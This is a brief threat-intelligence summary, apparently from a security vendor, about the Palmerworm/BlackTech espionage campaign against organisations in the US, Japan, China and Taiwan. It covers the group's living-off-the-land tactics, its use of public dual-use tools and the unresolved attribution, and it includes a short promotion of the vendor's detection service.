Researchers at Symantec have identified a new campaign from the group known as Palmerworm or BlackTech. The group has been around since 2013 but has never been attributed to a country. The attacks are targeting organizations in the US, Japan, China, and Taiwan and are aimed at stealing information. The threat actor utilized tactics such as living-off-the-land, where they used legitimate software and tools that are pre-installed on operating systems to remain undetected. Previously, the group has used spear-phishing to gain entry into a network but in the most recent campaign, the initial infection has not been identified. The malware used in this attack has not been used by the threat actor before. Researchers linked the group to these attacks through the use of infrastructure that has been linked to Palmerworm in the past. The use of dual-use tools has also been used by the group in the past and was identified in this campaign as well.
Analyst Notes
The group has shifted tactics during this attack as compared to previous incidents by beginning to use publicly available tools instead of ones they have developed themselves. By doing this, the group can remain undetected for a longer amount of time. This also makes it harder for researchers to link the group to the attack because anyone could have access to the tools that have been used. The goal of this attack has been to steal information from various companies in different countries. The industries targeted ranged from media outlets to finance, and many other sectors. Symantec has not linked the group to any one particular nation-state. Taiwanese officials have previously stated they believe the group is working on behalf of the Chinese Government. Some of the victims are located in China, which makes many believe that it is not a Chinese backed actor, but China has targeted organizations in their own country before. As with most espionage campaigns, companies should have basic monitoring in place such as Binary Defense’s Managed Detection and Response service that can help identify an attack, especially when the attackers are using legitimate software that may not be recognized by basic anti-virus software.
More can be read here: https://www.zdnet.com/article/these-hackers-have-spent-months-hiding-out-in-company-networks-undetected/
https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/palmerworm-blacktech-espionage-apt
